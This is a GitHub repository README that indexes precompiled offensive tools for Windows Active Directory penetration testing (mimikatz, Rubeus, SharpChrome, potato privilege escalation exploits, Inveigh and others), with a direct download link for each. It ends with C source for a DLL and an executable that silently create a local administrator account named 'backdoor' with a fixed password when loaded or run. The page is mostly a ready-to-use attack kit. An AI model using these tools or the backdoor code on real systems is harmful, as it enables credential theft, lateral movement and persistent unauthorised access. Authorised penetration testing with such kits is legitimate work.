[go: up one dir, main page]
Skip to content
/ precompiled-binaries Public

Collection of useful pre-compiled .NET binaries or other executables for penetration testing Windows Active Directory environments

71 stars 17 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

jakobfriedl/precompiled-binaries

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

60 Commits
Credentials
Credentials
 
 
Enumeration
Enumeration
 
 
LateralMovement
LateralMovement
 
 
PrivilegeEscalation
PrivilegeEscalation
 
 
Scripts
Scripts
 
 
README.md
README.md
 
 

Repository files navigation

Precompiled Binaries & AD Toolset

Collection of useful tools, scripts and pre-compiled binaries for enumerating and exploiting Active Directory environments or standalone Windows hosts. All binaries listed in this repository have either been downloaded from the official release page or compiled from the official source code using Visual Studio.

Table of Contents

Disclaimer

Caution

ONLY use for ethical purposes and against targets that you are permitted to attack!

Contents

Enumeration

Name Description Download
SharpHound Active directory enumeration and visualization https://github.com/jakobfriedl/precompiled-binaries/raw/main/Enumeration/SharpHound.exe
Seatbelt Windows host enumeration https://github.com/jakobfriedl/precompiled-binaries/raw/main/Enumeration/Seatbelt.exe
SharpUp Privilege Escalation Checks https://github.com/jakobfriedl/precompiled-binaries/raw/main/Enumeration/SharpUp.exe
winPEAS Windows host enumeration https://github.com/jakobfriedl/precompiled-binaries/raw/main/Enumeration/winPEAS.exe
SharpView C# Port of PowerView.ps1 https://github.com/jakobfriedl/precompiled-binaries/raw/main/Enumeration/SharpView.exe
NoPowerShell Execute PowerShell cmdlets in memory https://github.com/jakobfriedl/precompiled-binaries/raw/main/Enumeration/NoPowerShell.exe

Lateral Movement

Name Description Download
Rubeus Kerberos ticket attacks and abuse https://github.com/jakobfriedl/precompiled-binaries/raw/main/LateralMovement/Rubeus.exe
Whisker Shadow Credential attacks https://github.com/jakobfriedl/precompiled-binaries/raw/main/LateralMovement/Whisker.exe
ADFSDump Dump information from ADFS to be used with ADFSpoof https://github.com/jakobfriedl/precompiled-binaries/raw/main/LateralMovement/ADFSDump.exe
SharpSCCM Interaction with SCCM for lateral movement https://github.com/jakobfriedl/precompiled-binaries/raw/main/LateralMovement/SharpSCCM.exe
SpoolSample Coerce Authentication for Unconstrained Delegation https://github.com/jakobfriedl/precompiled-binaries/raw/main/LateralMovement/SpoolSample.exe
RunasCS C# Implementation of the runas command for lateral movement with valid credentials (not stealthy) https://github.com/jakobfriedl/precompiled-binaries/raw/main/LateralMovement/RunasCs.exe
ADModule Microsoft Signed DLL for importing the AD Module https://github.com/jakobfriedl/precompiled-binaries/raw/main/LateralMovement/ADModule.dll
SharpRDP CLI-based lateral movement with RDP https://github.com/jakobfriedl/precompiled-binaries/raw/main/LateralMovement/SharpRDP.exe
SharpSQL C# Port of PowerUpSQL.ps1 for SQL Server Exploitation https://github.com/jakobfriedl/precompiled-binaries/raw/main/LateralMovement/SharpSQL.exe
SharpMove Lateral Movement with .NET https://github.com/jakobfriedl/precompiled-binaries/raw/main/LateralMovement/SharpMove.exe
Sharpmad MachineAccountQuota and DNS Exploitation https://github.com/jakobfriedl/precompiled-binaries/raw/main/LateralMovement/Sharpmad.exe

GPO Abuse

Name Description Download
SharpGPO Group Policy modification and editing https://github.com/jakobfriedl/precompiled-binaries/blob/main/LateralMovement/GPOAbuse/SharpGPO.exe
SharpGPOAbuse Group Policy exploitation and abuse https://github.com/jakobfriedl/precompiled-binaries/raw/main/LateralMovement/GPOAbuse/SharpGPOAbuse.exe

Certificate Abuse

Name Description Download
Certify Certificate abuse and enumeration https://github.com/jakobfriedl/precompiled-binaries/raw/main/LateralMovement/CertificateAbuse/Certify.exe
PassTheCert Certificate abuse https://github.com/jakobfriedl/precompiled-binaries/raw/main/LateralMovement/CertificateAbuse/PassTheCert.exe
ForgeCert Certificate forging https://github.com/jakobfriedl/precompiled-binaries/raw/main/LateralMovement/CertificateAbuse/ForgeCert.exe

Azure AD Abuse

Name Description Download
ADSyncDecrypt Extract and decrypt Azure AD credentials https://github.com/jakobfriedl/precompiled-binaries/raw/main/LateralMovement/AzureAD/ADSyncDecrypt.exe
AzureAD_Decrypt_MSOL Dump and extract Azure AD credentials https://github.com/jakobfriedl/precompiled-binaries/raw/main/LateralMovement/AzureAD/AzureAD_Decrypt_MSOL.ps1

Credential Gathering

Name Description Download
mimikatz Credential dumping and ticket attacks https://github.com/jakobfriedl/precompiled-binaries/raw/main/Credentials/mimikatz.exe
SharpDPAPI Credential gathering https://github.com/jakobfriedl/precompiled-binaries/raw/main/Credentials/SharpDPAPI.exe
SharpChrome Credential gathering (specifically from Chrome) https://github.com/jakobfriedl/precompiled-binaries/raw/main/Credentials/SharpChrome.exe
SharpKatz C# Port of mimikatz https://github.com/jakobfriedl/precompiled-binaries/raw/main/Credentials/SharpKatz.exe
SharpLAPS Dump LAPS passwords https://github.com/jakobfriedl/precompiled-binaries/raw/main/Credentials/SharpLAPS.exe
BetterSafetyKatz Run latest mimikatz in memory https://github.com/jakobfriedl/precompiled-binaries/raw/main/Credentials/BetterSafetyKatz.exe
GMSAPasswordReader Dump GMSA passwords https://github.com/jakobfriedl/precompiled-binaries/raw/main/Credentials/GMSAPasswordReader.exe

Privilege Escalation

Name Description Download
PrintSpoofer Token Impersonation, SeImpersonatePrivilege https://github.com/jakobfriedl/precompiled-binaries/raw/main/PrivilegeEscalation/Token/PrintSpoofer64.exe
NetworkServiceExploit Token Impersonation, SeImpersonatePrivilege https://github.com/jakobfriedl/precompiled-binaries/raw/main/PrivilegeEscalation/Token/NetworkServiceExploit.exe
GodPotato Token Impersonation, SeImpersonatePrivilege https://github.com/jakobfriedl/precompiled-binaries/raw/main/PrivilegeEscalation/Token/GodPotato.exe
JuicyPotato Token Impersonation, SeImpersonatePrivilege https://github.com/jakobfriedl/precompiled-binaries/raw/main/PrivilegeEscalation/Token/JuicyPotato.exe
SharpEfsPotato Token Impersonation, SeImpersonatePrivilege https://github.com/jakobfriedl/precompiled-binaries/raw/main/PrivilegeEscalation/Token/SharpEfsPotato.exe
KrbRelayUp Universal Local Privilege Escalation in Domains where LDAP signing is not enforced https://github.com/jakobfriedl/precompiled-binaries/raw/main/PrivilegeEscalation/KrbRelayUp.exe
KrbRelay Privilege Escalation by relaying Kerberos from DCOM connection (Manual alternative to KrbRelayUp) https://github.com/jakobfriedl/precompiled-binaries/raw/main/PrivilegeEscalation/KrbRelay/KrbRelay.exe

Scripts

Name Description Download
PowerView Enumeration https://github.com/jakobfriedl/precompiled-binaries/raw/main/Scripts/PowerView.ps1
Powermad MachineAccountQuota and DNS Exploitation https://github.com/jakobfriedl/precompiled-binaries/raw/main/Scripts/Powermad.ps1
Inveigh MitM Attacks & Spoofing https://github.com/jakobfriedl/precompiled-binaries/raw/main/Scripts/Inveigh.ps1
PowerUp Windows Privilege Escalation https://github.com/jakobfriedl/precompiled-binaries/raw/main/Scripts/PowerUp.ps1
PowerUpSQL SQL Server Enumeration and Exploitation https://github.com/jakobfriedl/precompiled-binaries/raw/main/Scripts/PowerUpSQL.ps1
LAPSToolkit LAPS Password dumping https://github.com/jakobfriedl/precompiled-binaries/raw/main/Scripts/LAPSToolkit.ps1

Custom

SimpleBackdoorAdmin.dll

#include <stdlib.h>
#include <windows.h>

BOOL APIENTRY DllMain(
HANDLE hModule,// Handle to DLL module
DWORD ul_reason_for_call,// Reason for calling function
LPVOID lpReserved ) // Reserved
{
    switch ( ul_reason_for_call )
    {
        case DLL_PROCESS_ATTACH: // A process is loading the DLL.
        int i;
  	    i = system ("net user backdoor Password123! /add");
  	    i = system ("net localgroup administrators backdoor /add");
        break;
        case DLL_THREAD_ATTACH: // A process is creating a new thread.
        break;
        case DLL_THREAD_DETACH: // A thread exits normally.
        break;
        case DLL_PROCESS_DETACH: // A process unloads the DLL.
        break;
    }
    return TRUE;
}

SimpleBackdoorAdmin.exe

#include <stdlib.h>

int main ()
{
  system("net user backdoor Password123! /add");
  system("net localgroup administrators backdoor /add");

  return 0;
}

About

Collection of useful pre-compiled .NET binaries or other executables for penetration testing Windows Active Directory environments

Resources

Readme
Activity

Stars

71 stars

Watchers

2 watching

Forks

17 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages